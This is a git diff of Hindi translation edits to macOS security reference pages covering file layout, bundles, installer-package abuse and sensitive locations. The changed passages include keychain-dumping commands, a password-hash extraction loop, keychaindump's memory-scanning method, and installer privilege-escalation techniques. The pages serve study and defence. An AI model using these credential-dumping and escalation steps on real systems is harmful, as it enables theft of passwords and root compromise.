- **/Volumes**: माउंट किए गए ड्राइव यहाँ दिखाई देंगे।
- **/Volumes**: यहाँ माउंट किए गए ड्राइव दिखाई देंगे।
- **/.vol**: `stat a.txt` चलाने पर आपको कुछ ऐसा प्राप्त होता है `16777223 7545753 -rw-r--r-- 1 username wheel ...` जहाँ पहला नंबर उस वॉल्यूम का आईडी नंबर है जहाँ फ़ाइल मौजूद है और दूसरा इनोड नंबर है। आप इस फ़ाइल की सामग्री को /.vol/ के माध्यम से उस जानकारी के साथ एक्सेस कर सकते हैं `cat /.vol/16777223/7545753`
### ऐप् फ़ोल्डर
### ऐप्लिकेशन फ़ोल्डर
- **सिस्टम ऐप्** `/System/Applications` के अंतर्गत स्थित हैं
- **स्थापित** ऐप् आमतौर पर `/Applications` या `~/Applications` में स्थापित होते हैं
- **ऐप्लिकेशन डेटा** `/Library/Application Support` में उन ऐप्स के लिए मिल सकता है जो रूट के रूप में चल रहे हैं और `~/Library/Application Support` में उपयोगकर्ता के रूप में चल रहे ऐप्स के लिए।
- तीसरे पक्ष के ऐप् **डेमन** जो **रूट के रूप में चलने की आवश्यकता है** आमतौर पर `/Library/PrivilegedHelperTools/` में स्थित होते हैं
- **सिस्टम ऐप्लिकेशन** `/System/Applications` के अंतर्गत स्थित हैं
- **स्थापित** ऐप्लिकेशन आमतौर पर `/Applications` या `~/Applications` में स्थापित होते हैं
- **ऐप्लिकेशन डेटा** `/Library/Application Support` में उन ऐप्लिकेशनों के लिए पाया जा सकता है जो रूट के रूप में चल रही हैं और `~/Library/Application Support` में उपयोगकर्ता के रूप में चल रही ऐप्लिकेशनों के लिए।
- तीसरे पक्ष के ऐप्लिकेशन **डेमन** जो **रूट के रूप में चलने की आवश्यकता है** आमतौर पर `/Library/PrivilegedHelperTools/` में स्थित होते हैं
- **सैंडबॉक्स** ऐप्स `~/Library/Containers` फ़ोल्डर में मैप किए जाते हैं। प्रत्येक ऐप का एक फ़ोल्डर होता है जिसका नाम ऐप्लिकेशन के बंडल आईडी (`com.apple.Safari`) के अनुसार होता है।
- **कर्नेल** `/System/Library/Kernels/kernel` में स्थित है
- **Apple के कर्नेल एक्सटेंशन** `/System/Library/Extensions` में स्थित हैं
@ -48,7 +48,7 @@ macos-installers-abuse.md
## OS X विशिष्ट एक्सटेंशन
- **`.dmg`**: Apple डिस्क इमेज फ़ाइलें इंस्टॉलर्स के लिए बहुत सामान्य हैं।
- **`.kext`**: इसे एक विशिष्ट संरचना का पालन करना चाहिए और यह OS X का एक ड्राइवर है। (यह एक बंडल है)
- **`.kext`**: इसे एक विशिष्ट संरचना का पालन करना चाहिए और यह ड्राइवर का OS X संस्करण है। (यह एक बंडल है)
- **`.plist`**: जिसे प्रॉपर्टी लिस्ट के रूप में भी जाना जाता है, यह XML या बाइनरी प्रारूप में जानकारी संग्रहीत करता है।
- यह XML या बाइनरी हो सकता है। बाइनरी को पढ़ा जा सकता है:
- `defaults read config.plist`
@ -56,14 +56,14 @@ macos-installers-abuse.md
- `plutil -p ~/Library/Preferences/com.apple.screensaver.plist`
- `plutil -convert xml1 ~/Library/Preferences/com.apple.screensaver.plist -o -`
- `plutil -convert json ~/Library/Preferences/com.apple.screensaver.plist -o -`
- **`.app`**: Apple ऐप् जो निर्देशिका संरचना का पालन करते हैं (यह एक बंडल है)।
- **`.app`**: Apple ऐप्लिकेशन जो निर्देशिका संरचना का पालन करते हैं (यह एक बंडल है)।
- **`.dylib`**: डायनामिक लाइब्रेरी (जैसे Windows DLL फ़ाइलें)
- **`.pkg`**: ये xar (eXtensible Archive format) के समान हैं। इंस्टॉलर कमांड का उपयोग इन फ़ाइलों की सामग्री को स्थापित करने के लिए किया जा सकता है।
- **`.DS_Store`**: यह फ़ाइल प्रत्येक निर्देशिका में होती है, यह निर्देशिका के गुण और अनुकूलन को सहेजती है।
- **`.Spotlight-V100`**: यह फ़ोल्डर सिस्टम पर प्रत्येक वॉल्यूम के रूट निर्देशिका में दिखाई देता है।
- **`.metadata_never_index`**: यदि यह फ़ाइल किसी वॉल्यूम के रूट पर है तो Spotlight उस वॉल्यूम को इंडेक्स नहीं करेगा।
- **`.noindex`**: इस एक्सटेंशन वाली फ़ाइलें और फ़ोल्डर Spotlight द्वारा इंडेक्स नहीं किए जाएंगे।
- **`.sdef`**: बंडलों के अंदर फ़ाइलें जो यह निर्दिष्ट करती हैं कि AppleScript से ऐप्लिकेशन के साथ कैसे इंटरैक्ट करना संभव है।
- **`.sdef`**: बंडल के अंदर की फ़ाइलें यह निर्दिष्ट करती हैं कि AppleScript से ऐप्लिकेशन के साथ कैसे इंटरैक्ट करना संभव है।
### macOS बंडल
@ -82,7 +82,7 @@ iOS में आप इन्हें **`/System/Library/Caches/com.apple.dyld
dyld साझा कैश के समान, कर्नेल और कर्नेल एक्सटेंशन भी एक कर्नेल कैश में संकलित होते हैं, जिसे बूट समय पर लोड किया जाता है।
एकल फ़ाइल dylib साझा कैश से लाइब्रेरी निकालने के लिए बाइनरी [dyld_shared_cache_util](https://www.mbsplugins.de/files/dyld_shared_cache_util-dyld-733.8.zip) का उपयोग करना संभव था जो आजकल काम नहीं कर सकता है लेकिन आप [**dyldextractor**](https://github.com/arandomdev/dyldextractor) का भी उपयोग कर सकते हैं:
एकल फ़ाइल dylib साझा कैश से लाइब्रेरी निकालने के लिए, बाइनरी [dyld_shared_cache_util](https://www.mbsplugins.de/files/dyld_shared_cache_util-dyld-733.8.zip) का उपयोग करना संभव था जो आजकल काम नहीं कर सकता है लेकिन आप [**dyldextractor**](https://github.com/arandomdev/dyldextractor) का भी उपयोग कर सकते हैं:
```bash
# dyld_shared_cache_util
dyld_shared_cache_util -extract ~/shared_cache/ /System/Volumes/Preboot/Cryptexes/OS/System/Library/dyld/dyld_shared_cache_arm64e
@ -115,22 +115,22 @@ dyldex_all [dyld_shared_cache_path] # Extract all
env वेरिएबल का उपयोग करते हुए:
- **`DYLD_DHARED_REGION=private DYLD_SHARED_CACHE_DIR=</path/dir> DYLD_SHARED_CACHE_DONT_VALIDATE=1`** -> यह एक नया साझा पुस्तकालय कैश लोड करने की अनुमति देगा।
- **`DYLD_SHARED_CACHE_DIR=avoid`** और वास्तविक पुस्तकालयों के साथ साझा कैश के लिए सिमलिंक्स के साथ पुस्तकालयों को मैन्युअल रूप से बदलें (आपको उन्हें निकालने की आवश्यकता होगी)।
- **`DYLD_SHARED_CACHE_DIR=avoid`** और वास्तविक पुस्तकालयों के साथ साझा कैश के लिए सिमलिंक्स के साथ पुस्तकालयों को मैन्युअल रूप से बदलें (आपको उन्हें निकालने की आवश्यकता होगी)।
## विशेष फ़ाइल अनुमतियाँ
### फ़ोल्डर अनुमतियाँ
एक **फ़ोल्डर** में, **पढ़ने** की अनुमति **सूचीबद्ध** करने की अनुमति देती है, **लिखने** की अनुमति **हटाने** और **लिखने** की अनुमति देती है, और **निष्पादित** करने की अनुमति **निर्देशिका** को **पार** करने की अनुमति देती है। इसलिए, उदाहरण के लिए, एक उपयोगकर्ता जिसके पास एक फ़ाइल पर **पढ़ने की अनुमति** है, उस निर्देशिका में जहां उसके पास **निष्पादित** करने की अनुमति नहीं है, वह **फ़ाइल को पढ़ने में असमर्थ होगा**।
एक **फ़ोल्डर** में, **पढ़ने** की अनुमति **सूचीबद्ध** करने की अनुमति देती है, **लिखने** की अनुमति फ़ाइलों को **हटाने** और **लिखने** की अनुमति देती है, और **निष्पादित** करने की अनुमति निर्देशिका को **पार** करने की अनुमति देती है। इसलिए, उदाहरण के लिए, एक उपयोगकर्ता जिसके पास एक फ़ाइल पर **पढ़ने की अनुमति** है, उस निर्देशिका में जहां उसके पास **निष्पादित** करने की अनुमति नहीं है, वह फ़ाइल को **नहीं पढ़ सकेगा**।
### ध्वज संशोधक
कुछ ध्वज हैं जो फ़ाइलों में सेट किए जा सकते हैं जो फ़ाइल के व्यवहार को अलग तरीके से बना देंगे। आप `ls -lO /path/directory` के साथ एक निर्देशिका के अंदर फ़ाइलों के ध्वज **जांच सकते हैं**
- **`uchg`**: जिसे **uchange** ध्वज के रूप में जाना जाता है, यह **फ़ाइल** को बदलने या हटाने की **किसी भी क्रिया** को **रोक देगा**। इसे सेट करने के लिए करें: `chflags uchg file.txt`
- **`uchg`**: जिसे **uchange** ध्वज के रूप में जाना जाता है, यह **किसी भी क्रिया** को फ़ाइल को बदलने या हटाने से **रोकता है**। इसे सेट करने के लिए करें: `chflags uchg file.txt`
- रूट उपयोगकर्ता **ध्वज को हटा** सकता है और फ़ाइल को संशोधित कर सकता है।
- **`restricted`**: यह ध्वज फ़ाइल को **SIP द्वारा संरक्षित** बनाता है (आप इस ध्वज को फ़ाइल में नहीं जोड़ सकते)।
- **`Sticky bit`**: यदि एक निर्देशिका में स्टिकी बिट है, तो **केवल** **निर्देशिका का मालिक या रूट फ़ाइलों का नाम बदलने या हटाने** में सक्षम हो सकता है। आमतौर पर इसे /tmp निर्देशिका पर सेट किया जाता है ताकि सामान्य उपयोगकर्ता अन्य उपयोगकर्ताओं की फ़ाइलों को हटाने या स्थानांतरित करने से रोक सकें।
- **`Sticky bit`**: यदि एक निर्देशिका में स्टिकी बिट है, तो **केवल** **निर्देशिका का मालिक या रूट फ़ाइलों का नाम बदल सकता है या हटा सकता है**। आमतौर पर इसे /tmp निर्देशिका पर सेट किया जाता है ताकि सामान्य उपयोगकर्ता अन्य उपयोगकर्ताओं की फ़ाइलों को हटाने या स्थानांतरित करने से रोक सकें।
सभी ध्वज फ़ाइल `sys/stat.h` में पाए जा सकते हैं (इसे `mdfind stat.h | grep stat.h` का उपयोग करके खोजें) और हैं:
@ -158,7 +158,7 @@ env वेरिएबल का उपयोग करते हुए:
फ़ाइल **ACLs** में **ACE** (एक्सेस कंट्रोल एंट्रीज़) होती हैं जहां विभिन्न उपयोगकर्ताओं को अधिक **सूक्ष्म अनुमतियाँ** दी जा सकती हैं।
एक **निर्देशिका** को ये अनुमतियाँ दी जा सकती हैं: `सूची`, `खोज`, `फाइल जोड़ें`, `उपनिर्देशिका जोड़ें`, `बच्चे को हटाएँ`, `बच्चे को हटाएँ`।\
एक **निर्देशिका** को ये अनुमतियाँ दी जा सकती हैं: `सूची`, `खोज`, `फाइल जोड़ें`, `उप-निर्देशिका जोड़ें`, `बच्चे को हटाएँ`, `बच्चे को हटाएँ`।\
और एक **फ़ाइल** के लिए: `पढ़ें`, `लिखें`, `जोड़ें`, `निष्पादित करें`
जब फ़ाइल में ACLs होती हैं, तो आप अनुमतियों की सूची बनाते समय **"+" पाएंगे** जैसे:
@ -192,11 +192,11 @@ ls -RAle / 2>/dev/null | grep -E -B1 "\d: "
- `com.apple.uuidb.boot-uuid`: अद्वितीय UUID के साथ बूट युगों के logd मार्किंग
- `com.apple.decmpfs`: MacOS: पारदर्शी फ़ाइल संकुचन (II/7)
- `com.apple.cprotect`: \*OS: प्रति-फ़ाइल एन्क्रिप्शन डेटा (III/11)
- `com.apple.installd.*`: \*OS: installd द्वारा उपयोग किया जाने वाला मेटाडेटा, जैसे कि `installType`, `uniqueInstallID`
- `com.apple.installd.*`: \*OS: installd द्वारा उपयोग किया जाने वाला मेटाडेटा, जैसे, `installType`, `uniqueInstallID`
### संसाधन फोर्क | macOS ADS
यह **MacOS** मशीनों में **वैकल्पिक डेटा धाराओं** को प्राप्त करने का एक तरीका है। आप **file/..namedfork/rsrc** में एक फ़ाइल के अंदर **com.apple.ResourceFork** नामक विस्तारित विशेषता के अंदर सामग्री सहेज सकते हैं।
यह **MacOS** मशीनों में **वैकल्पिक डेटा धाराओं** को प्राप्त करने का एक तरीका है। आप **file/..namedfork/rsrc** के अंदर एक फ़ाइल के अंदर **com.apple.ResourceFork** नामक विस्तारित विशेषता के अंदर सामग्री सहेज सकते हैं।
```bash
echo "Hello" > a.txt
echo "Hello Mac ADS" > a.txt/..namedfork/rsrc

8
src/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-bundles.md
View File

@ -11,13 +11,13 @@ macOS में बंडल विभिन्न संसाधनों क
एक बंडल के भीतर, विशेष रूप से `<application>.app/Contents/` निर्देशिका के भीतर, कई महत्वपूर्ण संसाधन housed होते हैं:
- **\_CodeSignature**: यह निर्देशिका कोड-हस्ताक्षर विवरण संग्रहीत करती है जो एप्लिकेशन की अखंडता को सत्यापित करने के लिए महत्वपूर्ण है। आप कोड-हस्ताक्षर जानकारी की जांच कर सकते हैं जैसे: %%%bash openssl dgst -binary -sha1 /Applications/Safari.app/Contents/Resources/Assets.car | openssl base64 %%%
- **MacOS**: एप्लिकेशन का निष्पादन योग्य बाइनरी होता है जो उपयोगकर्ता की बातचीत पर चलता है।
- **MacOS**: एप्लिकेशन का निष्पादन योग्य बाइनरी शामिल है जो उपयोगकर्ता के इंटरैक्शन पर चलता है।
- **Resources**: एप्लिकेशन के उपयोगकर्ता इंटरफ़ेस घटकों के लिए एक भंडार जिसमें चित्र, दस्तावेज़, और इंटरफ़ेस विवरण (nib/xib फ़ाइलें) शामिल हैं।
- **Info.plist**: एप्लिकेशन की मुख्य कॉन्फ़िगरेशन फ़ाइल के रूप में कार्य करता है, जो सिस्टम को एप्लिकेशन को सही तरीके से पहचानने और बातचीत करने के लिए महत्वपूर्ण है।
- **Info.plist**: एप्लिकेशन की मुख्य कॉन्फ़िगरेशन फ़ाइल के रूप में कार्य करता है, जो सिस्टम को एप्लिकेशन को सही तरीके से पहचानने और इंटरैक्ट करने के लिए महत्वपूर्ण है।
#### Important Keys in Info.plist
`Info.plist` फ़ाइल एप्लिकेशन कॉन्फ़िगरेशन के लिए एक आधारशिला है, जिसमें कुंजी जैसे शामिल हैं:
`Info.plist` फ़ाइल एप्लिकेशन कॉन्फ़िगरेशन के लिए एक आधारशिला है, जिसमें निम्नलिखित कुंजी शामिल हैं:
- **CFBundleExecutable**: `Contents/MacOS` निर्देशिका में स्थित मुख्य निष्पादन योग्य फ़ाइल का नाम निर्दिष्ट करता है।
- **CFBundleIdentifier**: एप्लिकेशन के लिए एक वैश्विक पहचानकर्ता प्रदान करता है, जिसका उपयोग macOS द्वारा एप्लिकेशन प्रबंधन के लिए व्यापक रूप से किया जाता है।
@ -33,7 +33,7 @@ macOS में बंडल विभिन्न संसाधनों क
सामान्य निर्देशिकाओं के अलावा, बंडल में निम्नलिखित भी शामिल हो सकते हैं:
- **Frameworks**: एप्लिकेशन द्वारा उपयोग किए जाने वाले बंडल किए गए ढांचे को शामिल करता है। ढांचे dylibs के समान होते हैं जिनमें अतिरिक्त संसाधन होते हैं।
- **Frameworks**: एप्लिकेशन द्वारा उपयोग किए जाने वाले बंडल किए गए फ्रेमवर्क शामिल हैं। फ्रेमवर्क अतिरिक्त संसाधनों के साथ dylibs के समान होते हैं।
- **PlugIns**: एक निर्देशिका प्लग-इन्स और एक्सटेंशन के लिए जो एप्लिकेशन की क्षमताओं को बढ़ाते हैं।
- **XPCServices**: एप्लिकेशन द्वारा आउट-ऑफ-प्रोसेस संचार के लिए उपयोग की जाने वाली XPC सेवाओं को रखता है।

16
src/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-installers-abuse.md
View File

@ -15,8 +15,8 @@ macOS **installer package** (जिसे `.pkg` फ़ाइल के रू
- **Distribution (xml)**: कस्टमाइज़ेशन (शीर्षक, स्वागत पाठ…) और स्क्रिप्ट/स्थापना जांच
- **PackageInfo (xml)**: जानकारी, स्थापना आवश्यकताएँ, स्थापना स्थान, चलाने के लिए स्क्रिप्ट के पथ
- **Bill of materials (bom)**: फ़ाइलों की सूची जिन्हें स्थापित, अपडेट या हटा दिया जाना है फ़ाइल अनुमतियों के साथ
- **Payload (CPIO archive gzip compresses)**: फ़ाइलें जो PackageInfo से `install-location` में स्थापित की जाएंगी
- **Scripts (CPIO archive gzip compressed)**: पूर्व और पश्चात स्थापना स्क्रिप्ट और अधिक संसाधन जिन्हें निष्पादन के लिए एक अस्थायी निर्देशिका में निकाला गया है
- **Payload (CPIO archive gzip compresses)**: PackageInfo से `install-location` में स्थापित करने के लिए फ़ाइलें
- **Scripts (CPIO archive gzip compressed)**: पूर्व और पश्चात स्थापना स्क्रिप्ट और निष्पादन के लिए अस्थायी निर्देशिका में निकाली गई अधिक संसाधन
### Decompress
```bash
@ -47,9 +47,9 @@ DMG फ़ाइलें, या Apple Disk Images, एक फ़ाइल प
एक DMG फ़ाइल का पदानुक्रम सामग्री के आधार पर भिन्न हो सकता है। हालाँकि, एप्लिकेशन DMGs के लिए, यह आमतौर पर इस संरचना का पालन करता है:
- शीर्ष स्तर: यह डिस्क इमेज की जड़ है। इसमें अक्सर एप्लिकेशन और संभवतः एप्लिकेश फ़ोल्डर के लिए एक लिंक होता है।
- शीर्ष स्तर: यह डिस्क इमेज की जड़ है। इसमें अक्सर एप्लिकेशन और संभवतः एप्लिकेशंस फ़ोल्डर के लिए एक लिंक होता है।
- एप्लिकेशन (.app): यह वास्तविक एप्लिकेशन है। macOS में, एक एप्लिकेशन आमतौर पर एक पैकेज होता है जिसमें कई व्यक्तिगत फ़ाइलें और फ़ोल्डर होते हैं जो एप्लिकेशन बनाते हैं।
- एप्लिकेशन लिंक: यह macOS में एप्लिकेशन फ़ोल्डर के लिए एक शॉर्टकट है। इसका उद्देश्य आपको एप्लिकेशन स्थापित करने में आसानी प्रदान करना है। आप .app फ़ाइल को इस शॉर्टकट पर खींच सकते हैं ताकि ऐप स्थापित हो सके।
- एप्लिकेशंस लिंक: यह macOS में एप्लिकेशंस फ़ोल्डर के लिए एक शॉर्टकट है। इसका उद्देश्य आपको एप्लिकेशन स्थापित करने में आसानी प्रदान करना है। आप .app फ़ाइल को इस शॉर्टकट पर खींच सकते हैं ताकि ऐप स्थापित हो सके।
## pkg दुरुपयोग के माध्यम से प्रिवेस्क
@ -71,9 +71,9 @@ For more info check this talk: [https://www.youtube.com/watch?v=lTOItyjTTkw](htt
### Execution by mounting
यदि एक इंस्टॉलर `/tmp/fixedname/bla/bla` में लिखता है, तो आप **`/tmp/fixedname`** पर कोई मालिक नहीं के साथ **एक माउंट** बना सकते हैं ताकि आप इंस्टॉलेशन प्रक्रिया का दुरुपयोग करने के लिए **इंस्टॉलेशन के दौरान किसी भी फ़ाइल को संशोधित** कर सकें।
यदि एक इंस्टॉलर `/tmp/fixedname/bla/bla` में लिखता है, तो आप **`/tmp/fixedname`** पर कोई मालिक नहीं होने के साथ **एक माउंट** बना सकते हैं ताकि आप **इंस्टॉलेशन के दौरान किसी भी फ़ाइल को संशोधित कर सकें** और इंस्टॉलेशन प्रक्रिया का दुरुपयोग कर सकें।
इसका एक उदाहरण **CVE-2021-26089** है जिसने **रूट के रूप में निष्पादन** प्राप्त करने के लिए **एक आवधिक स्क्रिप्ट को ओवरराइट** करने में सफलता पाई। अधिक जानकारी के लिए इस टॉक को देखें: [**OBTS v4.0: "Mount(ain) of Bugs" - Csaba Fitzl**](https://www.youtube.com/watch?v=jSYPazD4VcE)
इसका एक उदाहरण **CVE-2021-26089** है जिसने **एक आवधिक स्क्रिप्ट को अधिलेखित** करने में सफलता प्राप्त की ताकि रूट के रूप में निष्पादन प्राप्त किया जा सके। अधिक जानकारी के लिए इस वार्ता को देखें: [**OBTS v4.0: "Mount(ain) of Bugs" - Csaba Fitzl**](https://www.youtube.com/watch?v=jSYPazD4VcE)
## pkg as malware
@ -83,7 +83,7 @@ For more info check this talk: [https://www.youtube.com/watch?v=lTOItyjTTkw](htt
### JS in Distribution xml
यह पैकेज के **वितरण xml** फ़ाइल में **`<script>`** टैग जोड़ना संभव है और वह कोड निष्पादित होगा और यह **`system.run`** का उपयोग करके **कमांड्स निष्पादित** कर सकता है:
यह पैकेज के **वितरण xml** फ़ाइल में **`<script>`** टैग जोड़ना संभव है और वह कोड निष्पादित होगा और यह **`system.run`** का उपयोग करके **कमांड निष्पादित कर सकता है**:
<figure><img src="../../../images/image (1043).png" alt=""><figcaption></figcaption></figure>
@ -152,7 +152,7 @@ productbuild --distribution dist.xml --package-path myapp.pkg final-installer.pk
```
## संदर्भ
- [**DEF CON 27 - पैकेजों को अनपैक करना: macOS इंस्टॉलर पैकेजों और सामान्य सुरक्षा दोषों के अंदर एक नज़र**](https://www.youtube.com/watch?v=iASSG0_zobQ)
- [**DEF CON 27 - पैकेजों को अनपैक करना: macOS इंस्टॉलर पैकेजों के अंदर एक नज़र और सामान्य सुरक्षा दोष**](https://www.youtube.com/watch?v=iASSG0_zobQ)
- [**OBTS v4.0: "macOS इंस्टॉलर की जंगली दुनिया" - टोनी लैम्बर्ट**](https://www.youtube.com/watch?v=Eow5uNHtmIg)
- [**DEF CON 27 - पैकेजों को अनपैक करना: macOS इंस्टॉलर पैकेजों के अंदर एक नज़र**](https://www.youtube.com/watch?v=kCXhIYtODBg)
- [https://redteamrecipe.com/macos-red-teaming?utm_source=pocket_shared#heading-exploiting-installer-packages](https://redteamrecipe.com/macos-red-teaming?utm_source=pocket_shared#heading-exploiting-installer-packages)

2
src/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-memory-dumping.md
View File

@ -6,7 +6,7 @@
### Swap Files
स्वैप फ़ाइलें, जैसे कि `/private/var/vm/swapfile0`, **भौतिक मेमोरी भर जाने पर कैश के रूप में कार्य करती हैं**। जब भौतिक मेमोरी में और कोई स्थान नहीं होता है, तो इसका डेटा एक स्वैप फ़ाइल में स्थानांतरित किया जाता है और फिर आवश्यकता के अनुसार भौतिक मेमोरी में वापस लाया जाता है। कई स्वैप फ़ाइलें हो सकती हैं, जिनके नाम जैसे swapfile0, swapfile1, आदि हो सकते हैं।
स्वैप फ़ाइलें, जैसे कि `/private/var/vm/swapfile0`, **भौतिक मेमोरी भर जाने पर कैश के रूप में कार्य करती हैं**। जब भौतिक मेमोरी में और जगह नहीं होती है, तो इसका डेटा एक स्वैप फ़ाइल में स्थानांतरित किया जाता है और फिर आवश्यकता के अनुसार भौतिक मेमोरी में वापस लाया जाता है। कई स्वैप फ़ाइलें हो सकती हैं, जिनके नाम जैसे swapfile0, swapfile1, आदि हो सकते हैं।
### Hibernate Image

20
src/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-sensitive-locations.md
View File

@ -21,7 +21,7 @@ sudo bash -c 'for i in $(find /var/db/dslocal/nodes/Default/users -type f -regex
### /etc/master.passwd
यह फ़ाइल **केवल उपयोग की जाती है** जब सिस्टम **सिंगल-यूजर मोड** में चल रहा हो (इसलिए बहुत बार नहीं)।
यह फ़ाइल **केवल उपयोग की जाती है** जब सिस्टम **सिंगल-यूजर मोड** में चल रहा हो (इसलिए बहुत बार नहीं)।
### Keychain Dump
@ -41,9 +41,9 @@ security dump-keychain -d #Dump all the info, included secrets (the user will be
### Keychaindump Overview
**keychaindump** नामक एक उपकरण macOS की कीचेन से पासवर्ड निकालने के लिए विकसित किया गया है, लेकिन यह Big Sur जैसे नए macOS संस्करणों पर सीमाओं का सामना करता है, जैसा कि एक [चर्चा](https://github.com/juuso/keychaindump/issues/10#issuecomment-751218760) में बताया गया है। **keychaindump** का उपयोग करने के लिए हमलावर को **root** तक पहुंच प्राप्त करनी और विशेषाधिकार बढ़ाने की आवश्यकता होती है। यह उपकरण इस तथ्य का लाभ उठाता है कि कीचेन उपयोगकर्ता लॉगिन के समय डिफ़ॉल्ट रूप से अनलॉक होता है, जिससे अनुप्रयोगों को बार-बार उपयोगकर्ता का पासवर्ड मांगे बिना इसे एक्सेस करने की अनुमति मिलती है। हालाँकि, यदि कोई उपयोगकर्ता प्रत्येक उपयोग के बाद अपनी कीचेन को लॉक करने का विकल्प चुनता है, तो **keychaindump** अप्रभावी हो जाता है।
**keychaindump** नामक एक उपकरण macOS की कीचेन से पासवर्ड निकालने के लिए विकसित किया गया है, लेकिन यह Big Sur जैसे नए macOS संस्करणों पर सीमाओं का सामना करता है, जैसा कि एक [चर्चा](https://github.com/juuso/keychaindump/issues/10#issuecomment-751218760) में बताया गया है। **keychaindump** का उपयोग करने के लिए हमलावर को **root** तक पहुंच प्राप्त करनी और विशेषाधिकार बढ़ाने की आवश्यकता होती है। यह उपकरण इस तथ्य का लाभ उठाता है कि कीचेन उपयोगकर्ता लॉगिन पर डिफ़ॉल्ट रूप से अनलॉक होता है, जिससे अनुप्रयोगों को बार-बार उपयोगकर्ता का पासवर्ड मांगे बिना इसे एक्सेस करने की अनुमति मिलती है। हालाँकि, यदि कोई उपयोगकर्ता प्रत्येक उपयोग के बाद अपनी कीचेन को लॉक करने का विकल्प चुनता है, तो **keychaindump** अप्रभावी हो जाता है।
**Keychaindump** एक विशेष प्रक्रिया को लक्षित करके काम करता है जिसे **securityd** कहा जाता है, जिसे Apple द्वारा प्राधिकरण और क्रिप्टोग्राफिक संचालन के लिए एक डेमन के रूप में वर्णित किया गया है, जो कीचेन तक पहुँचने के लिए महत्वपूर्ण है। निष्कर्षण प्रक्रिया में उपयोगकर्ता के लॉगिन पासवर्ड से निकाली गई **Master Key** की पहचान करना शामिल है। यह कुंजी कीचेन फ़ाइल को पढ़ने के लिए आवश्यक है। **Master Key** को खोजने के लिए, **keychaindump** `securityd` की मेमोरी हीप को `vmmap` कमांड का उपयोग करके स्कैन करता है, संभावित कुंजियों को `MALLOC_TINY` के रूप में चिह्नित क्षेत्रों के भीतर देखता है। इन मेमोरी स्थानों का निरीक्षण करने के लिए निम्नलिखित कमांड का उपयोग किया जाता है:
**Keychaindump** एक विशिष्ट प्रक्रिया **securityd** को लक्षित करके काम करता है, जिसे Apple द्वारा प्राधिकरण और क्रिप्टोग्राफिक संचालन के लिए एक डेमन के रूप में वर्णित किया गया है, जो कीचेन तक पहुँचने के लिए महत्वपूर्ण है। निष्कर्षण प्रक्रिया में उपयोगकर्ता के लॉगिन पासवर्ड से निकाली गई **Master Key** की पहचान करना शामिल है। यह कुंजी कीचेन फ़ाइल को पढ़ने के लिए आवश्यक है। **Master Key** को खोजने के लिए, **keychaindump** `vmmap` कमांड का उपयोग करके **securityd** की मेमोरी हीप को स्कैन करता है, संभावित कुंजियों को `MALLOC_TINY` के रूप में चिह्नित क्षेत्रों के भीतर देखता है। इन मेमोरी स्थानों का निरीक्षण करने के लिए निम्नलिखित कमांड का उपयोग किया जाता है:
```bash
sudo vmmap <securityd PID> | grep MALLOC_TINY
```
@ -145,14 +145,14 @@ for i in $(sqlite3 ~/Library/Group\ Containers/group.com.apple.notes/NoteStore.s
macOS ऐप्स में प्राथमिकताएँ **`$HOME/Library/Preferences`** में स्थित होती हैं और iOS में ये `/var/mobile/Containers/Data/Application/<UUID>/Library/Preferences` में होती हैं।
macOS में CLI टूल **`defaults`** का उपयोग **प्राथमिकताएँ फ़ाइल को संशोधित करने** के लिए किया जा सकता है।
macOS में CLI टूल **`defaults`** का उपयोग **प्राथमिकताएँ फ़ाइल संशोधित करने** के लिए किया जा सकता है।
**`/usr/sbin/cfprefsd`** XPC सेवाओं `com.apple.cfprefsd.daemon` और `com.apple.cfprefsd.agent` का दावा करता है और प्राथमिकताओं को संशोधित करने जैसे कार्य करने के लिए इसे बुलाया जा सकता है।
**`/usr/sbin/cfprefsd`** XPC सेवाओं `com.apple.cfprefsd.daemon` और `com.apple.cfprefsd.agent` का दावा करता है और प्राथमिकताएँ संशोधित करने जैसी क्रियाएँ करने के लिए इसे बुलाया जा सकता है।
## OpenDirectory permissions.plist
फ़ाइल `/System/Library/OpenDirectory/permissions.plist` नोड विशेषताओं पर लागू की गई अनुमतियों को शामिल करती है और इसे SIP द्वारा सुरक्षित किया गया है।\
यह फ़ाइल UUID द्वारा विशिष्ट उपयोगकर्ताओं को अनुमतियाँ प्रदान करती है (और uid द्वारा नहीं) ताकि वे `ShadowHashData`, `HeimdalSRPKey` और `KerberosKeys` जैसी विशिष्ट संवेदनशील जानकारी तक पहुँच सकें।
यह फ़ाइल UUID द्वारा विशिष्ट उपयोगकर्ताओं को अनुमतियाँ प्रदान करती है (और uid नहीं) ताकि वे `ShadowHashData`, `HeimdalSRPKey` और `KerberosKeys` जैसी विशिष्ट संवेदनशील जानकारी तक पहुँच सकें।
```xml
[...]
<key>dsRecTypeStandard:Computers</key>
@ -189,9 +189,9 @@ macOS में CLI टूल **`defaults`** का उपयोग **प्र
### डार्विन सूचनाएँ
सूचनाओं के लिए मुख्य डेमन **`/usr/sbin/notifyd`** है। सूचनाएँ प्राप्त करने के लिए, क्लाइंट्स को `com.apple.system.notification_center` मच पोर्ट के माध्यम से पंजीकरण कराना होगा (इन्हें `sudo lsmp -p <pid notifyd>` के साथ जांचें)। डेमन को फ़ाइल `/etc/notify.conf` के साथ कॉन्फ़िगर किया जा सकता है।
सूचनाओं के लिए मुख्य डेमन **`/usr/sbin/notifyd`** है। सूचनाएँ प्राप्त करने के लिए, क्लाइंट को `com.apple.system.notification_center` मच पोर्ट के माध्यम से पंजीकरण कराना होगा (इन्हें `sudo lsmp -p <pid notifyd>` के साथ जांचें)। डेमन को फ़ाइल `/etc/notify.conf` के साथ कॉन्फ़िगर किया जा सकता है।
सूचनाओं के लिए उपयोग किए जाने वाले नाम अद्वितीय रिवर्स DNS नोटेशन हैं और जब इनमें से किसी को सूचना भेजी जाती है, तो वे क्लाइंट(s) जो इसे संभालने के लिए संकेतित हैं, इसे प्राप्त करेंगे।
सूचनाओं के लिए उपयोग किए जाने वाले नाम अद्वितीय रिवर्स DNS नोटेशन हैं और जब इनमें से किसी को सूचना भेजी जाती है, तो वे क्लाइंट जो इसे संभालने के लिए संकेतित हैं, इसे प्राप्त करेंगे।
वर्तमान स्थिति को डंप करना संभव है (और सभी नामों को देखना) notifyd प्रक्रिया को SIGUSR2 सिग्नल भेजकर और उत्पन्न फ़ाइल को पढ़कर: `/var/run/notifyd_<pid>.status`:
```bash
